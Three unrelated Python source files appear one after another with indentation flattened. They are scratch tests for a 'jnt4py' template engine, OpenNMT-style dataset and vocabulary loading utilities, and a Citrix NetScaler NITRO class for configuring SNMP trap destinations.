# lexer = Lexer("${user.name}23412BAESFD$225B${name}${none}")
# arr = lexer.parse()
# for c in arr:
# print(c.string())
# dic = {"aaa":1}
# #dic.fromkeys
# t ="2"
# print(type(1))
# print(type(1.1))
# print(type(1.11112545225))
# print(type(""))
# print(type([]))
# print(type({}))
# print(type(True))
# class Parent(object):
# "父类"
# parentAttr = 100
# def __init__(self):
# super(Parent,self).__init__()
# print ("调用父类构造函数")
# def parentMethod(self):
# print ('调用父类方法')
# def setAttr(self, attr):
# Parent.parentAttr = attr
# def getAttr(self):
# print ("父类属性 :", Parent.parentAttr)
# def bbb(self):
# print ("父类bbb")
# class Child(Parent):
# "定义子类"
# def childMethod(self):
# print ('调用子类方法 child method')
# # 在子类中调用父类方法
# print (Parent.getAttr(self))
# def bbb(self):
# print ("Child类bbb")
# class DD(Child):
# "定义子类"
# def bbb(self):
# print ("dd类bbb")
# c = DD()
# c.childMethod()
#engine.configure(None)
# t = Template("hello ${name}")
# t.set("name","jnt4py")
# print(t.render())
#print(hasattr(t,"stringbb"))
#s = getattr(t,"string")
#print(s)
#print(getattr(t,"string"))
#print(dir(getattr(t,"context")) )
#print(t.string())
# class dd:
# def test(self,a,b):
# return a+b
# def test1():
# r = dd()
# arr=["test code:","success"]
# eval("r.test(arr[0],arr[1])")
# def test2():
# r = dd()
# arr=["test code:","success"]
# r.test(arr[0],arr[1])
# print(timeit('test1()', 'from __main__ import test1', number=10000))
# print(timeit('test2()', 'from __main__ import test2', number=10000))
# arr = [1,2,3,4,5,6,7]
# print(arr[2:-3])
# print(arr[2:len(arr)-3])
# g = lambda x,y: x +y
# text = "${g(2,8)}vvvvv"
# template = Template(text)
# template.set("g",g)
# print( template.render())
engine.configure()
# text = "$str.upper()"
# template = engine.create_template(text)
# template.set("str","hello jnt4py")
# render = template.render()
template = engine.create("$data[2]")
template.set("data", [7, 0, 2, 0, 6])
render = template.render()
print( render)
# list = ["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11"]
# print(list[1:3])
# print(list[1:])
#print(type(time.time()))
# dic = {"aaa":1,"bbb":2}
# for n in dic:
# print(dic[n]) |
# -*- coding: utf-8 -*-
import os
import codecs
from collections import Counter, defaultdict
from itertools import chain, count
import torch
import torchtext.data
import torchtext.vocab
from onmt.Utils import aeq
from pdb import set_trace
PAD_WORD = '<blank>'
UNK = 0
BOS_WORD = '<s>'
EOS_WORD = '</s>'
def _getstate(self):
return dict(self.__dict__, stoi=dict(self.stoi))
def _setstate(self, state):
self.__dict__.update(state)
self.stoi = defaultdict(lambda: 0, self.stoi)
torchtext.vocab.Vocab.__getstate__ = _getstate
torchtext.vocab.Vocab.__setstate__ = _setstate
def get_fields(data_type, n_src_features, n_tgt_features):
"""
Args:
data_type: type of the source input. Options are [text|img|audio].
n_src_features: the number of source features to create Field for.
n_tgt_features: the number of target features to create Field for.
Returns:
A dictionary whose keys are strings and whose values are the
corresponding Field objects.
"""
fields = {}
if data_type == 'text':
fields["src"] = torchtext.data.Field(
pad_token=PAD_WORD,
include_lengths=True)
elif data_type == 'img':
def make_img(data, _):
c = data[0].size(0)
h = max([t.size(1) for t in data])
w = max([t.size(2) for t in data])
imgs = torch.zeros(len(data), c, h, w)
for i, img in enumerate(data):
imgs[i, :, 0:img.size(1), 0:img.size(2)] = img
return imgs
fields["src"] = torchtext.data.Field(
use_vocab=False, tensor_type=torch.FloatTensor,
postprocessing=make_img, sequential=False)
elif data_type == 'audio':
def make_audio(data, _):
nfft = data[0].size(0)
t = max([t.size(1) for t in data])
sounds = torch.zeros(len(data), 1, nfft, t)
for i, spect in enumerate(data):
sounds[i, :, :, 0:spect.size(1)] = spect
return sounds
fields["src"] = torchtext.data.Field(
use_vocab=False, tensor_type=torch.FloatTensor,
postprocessing=make_audio, sequential=False)
for j in range(n_src_features):
fields["src_feat_"+str(j)] = \
torchtext.data.Field(pad_token=PAD_WORD)
fields["tgt"] = torchtext.data.Field(
init_token=BOS_WORD, eos_token=EOS_WORD,
pad_token=PAD_WORD)
for j in range(n_tgt_features):
fields["tgt_feat_"+str(j)] = \
torchtext.data.Field(init_token=BOS_WORD, eos_token=EOS_WORD,
pad_token=PAD_WORD)
def make_src(data, _):
src_size = max([t.size(0) for t in data])
src_vocab_size = max([t.max() for t in data]) + 1
alignment = torch.zeros(src_size, len(data), src_vocab_size)
for i, sent in enumerate(data):
for j, t in enumerate(sent):
alignment[j, i, t] = 1
return alignment
fields["src_map"] = torchtext.data.Field(
use_vocab=False, tensor_type=torch.FloatTensor,
postprocessing=make_src, sequential=False)
def make_tgt(data, _):
tgt_size = max([t.size(0) for t in data])
alignment = torch.zeros(tgt_size, len(data)).long()
for i, sent in enumerate(data):
alignment[:sent.size(0), i] = sent
return alignment
fields["alignment"] = torchtext.data.Field(
use_vocab=False, tensor_type=torch.LongTensor,
postprocessing=make_tgt, sequential=False)
fields["indices"] = torchtext.data.Field(
use_vocab=False, tensor_type=torch.LongTensor,
sequential=False)
return fields
def load_fields_from_vocab(vocab, data_type="text"):
"""
Load Field objects from `vocab.pt` file.
"""
vocab = dict(vocab)
n_src_features = len(collect_features(vocab, 'src'))
n_tgt_features = len(collect_features(vocab, 'tgt'))
fields = get_fields(data_type, n_src_features, n_tgt_features)
for k, v in vocab.items():
# Hack. Can't pickle defaultdict :(
v.stoi = defaultdict(lambda: 0, v.stoi)
fields[k].vocab = v
return fields
def save_fields_to_vocab(fields):
"""
Save Vocab objects in Field objects to `vocab.pt` file.
"""
vocab = []
for k, f in fields.items():
if 'vocab' in f.__dict__:
f.vocab.stoi = dict(f.vocab.stoi)
vocab.append((k, f.vocab))
return vocab
def merge_vocabs(vocabs, vocab_size=None):
"""
Merge individual vocabularies (assumed to be generated from disjoint
documents) into a larger vocabulary.
Args:
vocabs: `torchtext.vocab.Vocab` vocabularies to be merged
vocab_size: `int` the final vocabulary size. `None` for no limit.
Return:
`torchtext.vocab.Vocab`
"""
merged = sum([vocab.freqs for vocab in vocabs], Counter())
return torchtext.vocab.Vocab(merged,
specials=[PAD_WORD, BOS_WORD, EOS_WORD],
max_size=vocab_size)
def make_features(batch, side, data_type='text'):
"""
Args:
batch (Variable): a batch of source or target data.
side (str): for source or for target.
data_type (str): type of the source input. Options are [text|img].
Returns:
A sequence of src/tgt tensors with optional feature tensors
of size (len x batch).
"""
assert side in ['src', 'tgt']
if isinstance(batch.__dict__[side], tuple):
data = batch.__dict__[side][0]
else:
data = batch.__dict__[side]
feat_start = side + "_feat_"
keys = sorted([k for k in batch.__dict__ if feat_start in k])
features = [batch.__dict__[k] for k in keys]
levels = [data] + features
if data_type == 'text':
return torch.cat([level.unsqueeze(2) for level in levels], 2)
else:
return levels[0]
def extract_features(tokens):
"""
Args:
tokens: A list of tokens, where each token consists of a word,
optionally followed by u"│"-delimited features.
Returns:
A sequence of words, a sequence of features, and num of features.
"""
if not tokens:
return [], [], -1
split_tokens = [token.split("\uffe8") for token in tokens]
split_tokens = [token for token in split_tokens if token[0]]
# set_trace()
token_size = len(split_tokens[0])
# if not all(len(token) == token_size for token in split_tokens):
# set_trace()
assert all(len(token) == token_size for token in split_tokens), \
"all words must have the same number of features"
words_and_features = list(zip(*split_tokens))
words = words_and_features[0]
features = words_and_features[1:]
return words, features, token_size - 1
def collect_features(fields, side="src"):
"""
Collect features from Field object.
"""
assert side in ["src", "tgt"]
feats = []
for j in count():
key = side + "_feat_" + str(j)
if key not in fields:
break
feats.append(key)
return feats
def collect_feature_vocabs(fields, side):
"""
Collect feature Vocab objects from Field object.
"""
assert side in ['src', 'tgt']
feature_vocabs = []
for j in count():
key = side + "_feat_" + str(j)
if key not in fields:
break
feature_vocabs.append(fields[key].vocab)
return feature_vocabs
def build_dataset(fields, data_type, src_path, tgt_path, src_dir=None,
src_seq_length=0, tgt_seq_length=0,
src_seq_length_trunc=0, tgt_seq_length_trunc=0,
dynamic_dict=True, sample_rate=0,
window_size=0, window_stride=0, window=None,
normalize_audio=True, use_filter_pred=True):
# Hide this import inside to avoid circular dependency problem.
from onmt.io import TextDataset, ImageDataset, AudioDataset
# Build src/tgt examples iterator from corpus files, also extract
# number of features. For all data types, the tgt side corpus is
# in form of text.
src_examples_iter, num_src_feats = \
_make_examples_nfeats_tpl(data_type, src_path, src_dir,
src_seq_length_trunc, sample_rate,
window_size, window_stride,
window, normalize_audio)
tgt_examples_iter, num_tgt_feats = \
_make_text_examples_nfeats_tpl(tgt_path, tgt_seq_length_trunc, "tgt")
if data_type == 'text':
dataset = TextDataset(fields, src_examples_iter, tgt_examples_iter,
num_src_feats, num_tgt_feats,
src_seq_length=src_seq_length,
tgt_seq_length=tgt_seq_length,
dynamic_dict=dynamic_dict,
use_filter_pred=use_filter_pred)
elif data_type == 'img':
dataset = ImageDataset(fields, src_examples_iter, tgt_examples_iter,
num_src_feats, num_tgt_feats,
tgt_seq_length=tgt_seq_length,
use_filter_pred=use_filter_pred)
elif data_type == 'audio':
dataset = AudioDataset(fields, src_examples_iter, tgt_examples_iter,
num_src_feats, num_tgt_feats,
tgt_seq_length=tgt_seq_length,
sample_rate=sample_rate,
window_size=window_size,
window_stride=window_stride,
window=window,
normalize_audio=normalize_audio,
use_filter_pred=use_filter_pred)
return dataset
def build_vocab(train_datasets, data_type, share_vocab,
src_vocab_size, src_words_min_frequency,
tgt_vocab_size, tgt_words_min_frequency):
"""
Args:
train_datasets: a list of train dataset.
data_type: "text", "img" or "audio"?
share_vocab(bool): share source and target vocabulary?
src_vocab_size(int): size of the source vocabulary.
src_words_min_frequency(int): the minimum frequency needed to
include a source word in the vocabulary.
tgt_vocab_size(int): size of the target vocabulary.
tgt_words_min_frequency(int): the minimum frequency needed to
include a target word in the vocabulary.
"""
# All datasets have same fields, get the first one is OK.
fields = train_datasets[0].fields
fields["tgt"].build_vocab(*train_datasets, max_size=tgt_vocab_size,
min_freq=tgt_words_min_frequency)
for j in range(train_datasets[0].n_tgt_feats):
fields["tgt_feat_" + str(j)].build_vocab(*train_datasets)
if data_type == 'text':
fields["src"].build_vocab(*train_datasets, max_size=src_vocab_size,
min_freq=src_words_min_frequency)
for j in range(train_datasets[0].n_src_feats):
fields["src_feat_" + str(j)].build_vocab(*train_datasets)
# Merge the input and output vocabularies.
if share_vocab:
# `tgt_vocab_size` is ignored when sharing vocabularies
merged_vocab = merge_vocabs(
[fields["src"].vocab, fields["tgt"].vocab],
vocab_size=src_vocab_size)
fields["src"].vocab = merged_vocab
fields["tgt"].vocab = merged_vocab
def _join_dicts(*args):
"""
Args:
dictionaries with disjoint keys.
Returns:
a single dictionary that has the union of these keys.
"""
return dict(chain(*[d.items() for d in args]))
def _peek(seq):
"""
Args:
seq: an iterator.
Returns:
the first thing returned by calling next() on the iterator
and an iterator created by re-chaining that value to the beginning
of the iterator.
"""
first = next(seq)
return first, chain([first], seq)
def _construct_example_fromlist(data, fields):
ex = torchtext.data.Example()
for (name, field), val in zip(fields, data):
if field is not None:
setattr(ex, name, field.preprocess(val))
else:
setattr(ex, name, val)
return ex
def _read_text_file(path, truncate, side):
"""
Args:
path: location of a src or tgt file.
truncate: maximum sequence length (0 for unlimited).
Yields:
(word, features, nfeat) triples for each line.
"""
with codecs.open(path, "r", "utf-8") as corpus_file:
for i, line in enumerate(corpus_file):
line = line.strip().split(' ')
# set_trace()
# lines = (line.split(' ') for line in corpus_file)
# set_trace()
if truncate:
line = line[:truncate]
# lines = (line[:truncate] for line in lines)
# for line in lines:
words, feats, n_feats = extract_features(line)
example_dict = {side: words, "indices": i}
if feats:
prefix = side + "_feat_"
example_dict.update((prefix + str(j), f)
for j, f in enumerate(feats))
yield example_dict, n_feats
def _read_img_file(path, src_dir, side, truncate=None):
"""
Args:
path: location of a src file containing image paths
src_dir: location of source images
side: 'src' or 'tgt'
truncate: maximum img size ((0,0) or None for unlimited)
Yields:
a dictionary containing image data, path and index for each line.
"""
assert (src_dir is not None) and os.path.exists(src_dir),\
'src_dir must be a valid directory if data_type is img'
global Image, transforms
from PIL import Image
from torchvision import transforms
with codecs.open(path, "r", "utf-8") as corpus_file:
index = 0
for line in corpus_file:
img_path = os.path.join(src_dir, line.strip())
if not os.path.exists(img_path):
img_path = line
assert os.path.exists(img_path), \
'img path %s not found' % (line.strip())
img = transforms.ToTensor()(Image.open(img_path))
if truncate and truncate != (0, 0):
if not (img.size(1) <= truncate[0]
and img.size(2) <= truncate[1]):
continue
example_dict = {side: img,
side+'_path': line.strip(),
'indices': index}
index += 1
yield example_dict
def _read_audio_file(path, src_dir, side, sample_rate, window_size,
window_stride, window, normalize_audio, truncate=None):
"""
Args:
path: location of a src file containing audio paths.
src_dir: location of source audio files.
side: 'src' or 'tgt'.
sample_rate: sample_rate.
window_size: window size for spectrogram in seconds.
window_stride: window stride for spectrogram in seconds.
window: window type for spectrogram generation.
normalize_audio: subtract spectrogram by mean and divide by std or not
truncate: maximum audio length (0 or None for unlimited).
Yields:
a dictionary containing audio data for each line.
"""
assert (src_dir is not None) and os.path.exists(src_dir),\
"src_dir must be a valid directory if data_type is audio"
global torchaudio, librosa, np
import torchaudio
import librosa
import numpy as np
with codecs.open(path, "r", "utf-8") as corpus_file:
index = 0
for line in corpus_file:
audio_path = os.path.join(src_dir, line.strip())
if not os.path.exists(audio_path):
audio_path = line
assert os.path.exists(audio_path), \
'audio path %s not found' % (line.strip())
sound, sample_rate = torchaudio.load(audio_path)
if truncate and truncate > 0:
if sound.size(0) > truncate:
continue
assert sample_rate == sample_rate, \
'Sample rate of %s != -sample_rate (%d vs %d)' \
% (audio_path, sample_rate, sample_rate)
sound = sound.numpy()
if len(sound.shape) > 1:
if sound.shape[1] == 1:
sound = sound.squeeze()
else:
sound = sound.mean(axis=1) # average multiple channels
n_fft = int(sample_rate * window_size)
win_length = n_fft
hop_length = int(sample_rate * window_stride)
# STFT
d = librosa.stft(sound, n_fft=n_fft, hop_length=hop_length,
win_length=win_length, window=window)
spect, _ = librosa.magphase(d)
spect = np.log1p(spect)
spect = torch.FloatTensor(spect)
if normalize_audio:
mean = spect.mean()
std = spect.std()
spect.add_(-mean)
spect.div_(std)
example_dict = {side: spect,
side + '_path': line.strip(),
'indices': index}
index += 1
yield example_dict
def _make_text_examples_nfeats_tpl(path, truncate, side):
"""
Process the text corpus into (example_dict iterator, num_feats) tuple.
"""
assert side in ['src', 'tgt']
if path is None:
return (None, 0)
# All examples have same number of features, so we peek first one
# to get the num_feats.
# set_trace()
examples_nfeats_iter = _read_text_file(path, truncate, side)
(_, num_feats), examples_nfeats_iter = _peek(examples_nfeats_iter)
examples_iter = (ex for ex, nfeats in examples_nfeats_iter)
return (examples_iter, num_feats)
def _make_examples_nfeats_tpl(data_type, src_path, src_dir,
src_seq_length_trunc, sample_rate,
window_size, window_stride,
window, normalize_audio):
"""
Process the corpus into (example_dict iterator, num_feats) tuple
on source side for different 'data_type'.
"""
if data_type == 'text':
src_examples_iter, num_src_feats = _make_text_examples_nfeats_tpl(
src_path, src_seq_length_trunc, "src")
elif data_type == 'img':
src_examples_iter = _read_img_file(src_path, src_dir, "src")
num_src_feats = 0 # Source side(img) has no features.
elif data_type == 'audio':
src_examples_iter = _read_audio_file(src_path, src_dir, "src",
sample_rate, window_size,
window_stride, window,
normalize_audio)
num_src_feats = 0 # Source side(audio) has no features.
return src_examples_iter, num_src_feats
class OrderedIterator(torchtext.data.Iterator):
def create_batches(self):
if self.train:
self.batches = torchtext.data.pool(
self.data(), self.batch_size,
self.sort_key, self.batch_size_fn,
random_shuffler=self.random_shuffler)
else:
self.batches = []
for b in torchtext.data.batch(self.data(), self.batch_size,
self.batch_size_fn):
self.batches.append(sorted(b, key=self.sort_key))
class ONMTDatasetBase(torchtext.data.Dataset):
"""
A dataset basically supports iteration over all the examples
it contains. We currently have 3 datasets inheriting this base
for 3 types of corpus respectively: "text", "img", "audio".
Internally it initializes an `torchtext.data.Dataset` object with
the following attributes:
`examples`: a sequence of `torchtext.data.Example` objects.
`fields`: a dictionary associating str keys with Field objects. Does not
necessarily have the same keys as the input fields.
"""
def __init__(self, *args, **kwargs):
examples, fields, filter_pred = self._process_corpus(*args, **kwargs)
super(ONMTDatasetBase, self).__init__(
examples, fields, filter_pred
)
def __getstate__(self):
return self.__dict__
def __setstate__(self, d):
self.__dict__.update(d)
def __reduce_ex__(self, proto):
"This is a hack. Something is broken with torch pickle."
return super(ONMTDatasetBase, self).__reduce_ex__()
def collapse_copy_scores(self, scores, batch, tgt_vocab):
"""
Given scores from an expanded dictionary
corresponeding to a batch, sums together copies,
with a dictionary word when it is ambigious.
"""
offset = len(tgt_vocab)
for b in range(batch.batch_size):
index = batch.indices.data[b]
src_vocab = self.src_vocabs[index]
for i in range(1, len(src_vocab)):
sw = src_vocab.itos[i]
ti = tgt_vocab.stoi[sw]
if ti != 0:
scores[:, b, ti] += scores[:, b, offset + i]
scores[:, b, offset + i].fill_(1e-20)
return scores
@staticmethod
def coalesce_datasets(datasets):
"""Coalesce all dataset instances. """
final = datasets[0]
for d in datasets[1:]:
# `src_vocabs` is a list of `torchtext.vocab.Vocab`.
# Each sentence transforms into on Vocab.
# Coalesce them into one big list.
final.src_vocabs += d.src_vocabs
# All datasets have same number of features.
aeq(final.n_src_feats, d.n_src_feats)
aeq(final.n_tgt_feats, d.n_tgt_feats)
# `examples` is a list of `torchtext.data.Example`.
# Coalesce them into one big list.
final.examples += d.examples
# All datasets have same fields, no need to update.
return final
|
#
# Copyright (c) 2008-2016 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class snmptrap(base_resource) :
""" Configuration for snmp trap resource. """
def __init__(self) :
self._trapclass = None
self._trapdestination = None
self._version = None
self._td = None
self._destport = None
self._communityname = None
self._srcip = None
self._severity = None
self._allpartitions = None
self.___count = None
@property
def trapclass(self) :
r"""Type of trap messages that the NetScaler appliance sends to the trap listener: Generic or the enterprise-specific messages defined in the MIB file.<br/>Possible values = generic, specific.
"""
try :
return self._trapclass
except Exception as e:
raise e
@trapclass.setter
def trapclass(self, trapclass) :
r"""Type of trap messages that the NetScaler appliance sends to the trap listener: Generic or the enterprise-specific messages defined in the MIB file.<br/>Possible values = generic, specific
"""
try :
self._trapclass = trapclass
except Exception as e:
raise e
@property
def trapdestination(self) :
r"""IPv4 or the IPv6 address of the trap listener to which the NetScaler appliance is to send SNMP trap messages.<br/>Minimum length = 1.
"""
try :
return self._trapdestination
except Exception as e:
raise e
@trapdestination.setter
def trapdestination(self, trapdestination) :
r"""IPv4 or the IPv6 address of the trap listener to which the NetScaler appliance is to send SNMP trap messages.<br/>Minimum length = 1
"""
try :
self._trapdestination = trapdestination
except Exception as e:
raise e
@property
def version(self) :
r"""SNMP version, which determines the format of trap messages sent to the trap listener.
This setting must match the setting on the trap listener. Otherwise, the listener drops the trap messages.<br/>Default value: V2<br/>Possible values = V1, V2, V3.
"""
try :
return self._version
except Exception as e:
raise e
@version.setter
def version(self, version) :
r"""SNMP version, which determines the format of trap messages sent to the trap listener.
This setting must match the setting on the trap listener. Otherwise, the listener drops the trap messages.<br/>Default value: V2<br/>Possible values = V1, V2, V3
"""
try :
self._version = version
except Exception as e:
raise e
@property
def td(self) :
r"""Integer value that uniquely identifies the traffic domain in which you want to configure the entity. If you do not specify an ID, the entity becomes part of the default traffic domain, which has an ID of 0.<br/>Maximum length = 4094.
"""
try :
return self._td
except Exception as e:
raise e
@td.setter
def td(self, td) :
r"""Integer value that uniquely identifies the traffic domain in which you want to configure the entity. If you do not specify an ID, the entity becomes part of the default traffic domain, which has an ID of 0.<br/>Maximum length = 4094
"""
try :
self._td = td
except Exception as e:
raise e
@property
def destport(self) :
r"""UDP port at which the trap listener listens for trap messages. This setting must match the setting on the trap listener. Otherwise, the listener drops the trap messages.<br/>Default value: 162<br/>Minimum length = 1<br/>Maximum length = 65534.
"""
try :
return self._destport
except Exception as e:
raise e
@destport.setter
def destport(self, destport) :
r"""UDP port at which the trap listener listens for trap messages. This setting must match the setting on the trap listener. Otherwise, the listener drops the trap messages.<br/>Default value: 162<br/>Minimum length = 1<br/>Maximum length = 65534
"""
try :
self._destport = destport
except Exception as e:
raise e
@property
def communityname(self) :
r"""Password (string) sent with the trap messages, so that the trap listener can authenticate them. Can include 1 to 31 uppercase or lowercase letters, numbers, and hyphen (-), period (.) pound (#), space ( ), at (@), equals (=), colon (:), and underscore (_) characters.
You must specify the same community string on the trap listener device. Otherwise, the trap listener drops the trap messages.
The following requirement applies only to the NetScaler CLI:
If the string includes one or more spaces, enclose the name in double or single quotation marks (for example, "my string" or 'my string').
"""
try :
return self._communityname
except Exception as e:
raise e
@communityname.setter
def communityname(self, communityname) :
r"""Password (string) sent with the trap messages, so that the trap listener can authenticate them. Can include 1 to 31 uppercase or lowercase letters, numbers, and hyphen (-), period (.) pound (#), space ( ), at (@), equals (=), colon (:), and underscore (_) characters.
You must specify the same community string on the trap listener device. Otherwise, the trap listener drops the trap messages.
The following requirement applies only to the NetScaler CLI:
If the string includes one or more spaces, enclose the name in double or single quotation marks (for example, "my string" or 'my string').
"""
try :
self._communityname = communityname
except Exception as e:
raise e
@property
def srcip(self) :
r"""IPv4 or IPv6 address that the NetScaler appliance inserts as the source IP address in all SNMP trap messages that it sends to this trap listener. By default this is the appliance's NSIP or NSIP6 address, but you can specify an IPv4 MIP or SNIP address or a SNIP6 address.<br/>Minimum length = 1.
"""
try :
return self._srcip
except Exception as e:
raise e
@srcip.setter
def srcip(self, srcip) :
r"""IPv4 or IPv6 address that the NetScaler appliance inserts as the source IP address in all SNMP trap messages that it sends to this trap listener. By default this is the appliance's NSIP or NSIP6 address, but you can specify an IPv4 MIP or SNIP address or a SNIP6 address.<br/>Minimum length = 1
"""
try :
self._srcip = srcip
except Exception as e:
raise e
@property
def severity(self) :
r"""Severity level at or above which the NetScaler appliance sends trap messages to this trap listener. The severity levels, in increasing order of severity, are Informational, Warning, Minor, Major, Critical. This parameter can be set for trap listeners of type SPECIFIC only. The default is to send all levels of trap messages.
Important: Trap messages are not assigned severity levels unless you specify severity levels when configuring SNMP alarms.<br/>Default value: Unknown<br/>Possible values = Critical, Major, Minor, Warning, Informational.
"""
try :
return self._severity
except Exception as e:
raise e
@severity.setter
def severity(self, severity) :
r"""Severity level at or above which the NetScaler appliance sends trap messages to this trap listener. The severity levels, in increasing order of severity, are Informational, Warning, Minor, Major, Critical. This parameter can be set for trap listeners of type SPECIFIC only. The default is to send all levels of trap messages.
Important: Trap messages are not assigned severity levels unless you specify severity levels when configuring SNMP alarms.<br/>Default value: Unknown<br/>Possible values = Critical, Major, Minor, Warning, Informational
"""
try :
self._severity = severity
except Exception as e:
raise e
@property
def allpartitions(self) :
r"""Send traps of all partitions to this destination.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._allpartitions
except Exception as e:
raise e
@allpartitions.setter
def allpartitions(self, allpartitions) :
r"""Send traps of all partitions to this destination.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._allpartitions = allpartitions
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(snmptrap_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.snmptrap
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
if self.trapclass is not None :
return str(self.trapclass)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
r""" Use this API to add snmptrap.
"""
try :
if type(resource) is not list :
addresource = snmptrap()
addresource.trapclass = resource.trapclass
addresource.trapdestination = resource.trapdestination
addresource.version = resource.version
addresource.td = resource.td
addresource.destport = resource.destport
addresource.communityname = resource.communityname
addresource.srcip = resource.srcip
addresource.severity = resource.severity
addresource.allpartitions = resource.allpartitions
return addresource.add_resource(client)
else :
if (resource and len(resource) > 0) :
addresources = [ snmptrap() for _ in range(len(resource))]
for i in range(len(resource)) :
addresources[i].trapclass = resource[i].trapclass
addresources[i].trapdestination = resource[i].trapdestination
addresources[i].version = resource[i].version
addresources[i].td = resource[i].td
addresources[i].destport = resource[i].destport
addresources[i].communityname = resource[i].communityname
addresources[i].srcip = resource[i].srcip
addresources[i].severity = resource[i].severity
addresources[i].allpartitions = resource[i].allpartitions
result = cls.add_bulk_request(client, addresources)
return result
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
r""" Use this API to delete snmptrap.
"""
try :
if type(resource) is not list :
deleteresource = snmptrap()
if type(resource) != type(deleteresource):
deleteresource.trapclass = resource
else :
deleteresource.trapclass = resource.trapclass
deleteresource.trapdestination = resource.trapdestination
deleteresource.version = resource.version
deleteresource.td = resource.td
return deleteresource.delete_resource(client)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
deleteresources = [ snmptrap() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].trapclass = resource[i]
else :
if (resource and len(resource) > 0) :
deleteresources = [ snmptrap() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].trapclass = resource[i].trapclass
deleteresources[i].trapdestination = resource[i].trapdestination
deleteresources[i].version = resource[i].version
deleteresources[i].td = resource[i].td
result = cls.delete_bulk_request(client, deleteresources)
return result
except Exception as e :
raise e
@classmethod
def update(cls, client, resource) :
r""" Use this API to update snmptrap.
"""
try :
if type(resource) is not list :
updateresource = snmptrap()
updateresource.trapclass = resource.trapclass
updateresource.trapdestination = resource.trapdestination
updateresource.version = resource.version
updateresource.td = resource.td
updateresource.destport = resource.destport
updateresource.communityname = resource.communityname
updateresource.srcip = resource.srcip
updateresource.severity = resource.severity
updateresource.allpartitions = resource.allpartitions
return updateresource.update_resource(client)
else :
if (resource and len(resource) > 0) :
updateresources = [ snmptrap() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].trapclass = resource[i].trapclass
updateresources[i].trapdestination = resource[i].trapdestination
updateresources[i].version = resource[i].version
updateresources[i].td = resource[i].td
updateresources[i].destport = resource[i].destport
updateresources[i].communityname = resource[i].communityname
updateresources[i].srcip = resource[i].srcip
updateresources[i].severity = resource[i].severity
updateresources[i].allpartitions = resource[i].allpartitions
result = cls.update_bulk_request(client, updateresources)
return result
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
r""" Use this API to unset the properties of snmptrap resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = snmptrap()
unsetresource.trapclass = resource.trapclass
unsetresource.trapdestination = resource.trapdestination
unsetresource.version = resource.version
unsetresource.td = resource.td
return unsetresource.unset_resource(client, args)
else :
if type(resource[0]) == cls :
if (resource and len(resource) > 0) :
unsetresources = [ snmptrap() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].trapclass = resource[i].trapclass
unsetresources[i].trapdestination = resource[i].trapdestination
unsetresources[i].version = resource[i].version
unsetresources[i].td = resource[i].td
result = cls.unset_bulk_request(client, unsetresources, args)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
r""" Use this API to fetch all the snmptrap resources that are configured on netscaler.
"""
try :
if not name :
obj = snmptrap()
response = obj.get_resources(client, option_)
else :
if type(name) == cls :
if type(name) is not list :
option_ = options()
option_.args = nitro_util.object_to_string_withoutquotes(name)
response = name.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [snmptrap() for _ in range(len(name))]
for i in range(len(name)) :
option_ = options()
option_.args = nitro_util.object_to_string_withoutquotes(name[i])
response[i] = name[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
r""" Use this API to fetch filtered set of snmptrap resources.
filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = snmptrap()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
r""" Use this API to count the snmptrap resources configured on NetScaler.
"""
try :
obj = snmptrap()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
r""" Use this API to count filtered the set of snmptrap resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = snmptrap()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Allpartitions:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Trapclass:
generic = "generic"
specific = "specific"
class Severity:
Critical = "Critical"
Major = "Major"
Minor = "Minor"
Warning = "Warning"
Informational = "Informational"
class Version:
V1 = "V1"
V2 = "V2"
V3 = "V3"
class snmptrap_response(base_response) :
def __init__(self, length=1) :
self.snmptrap = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
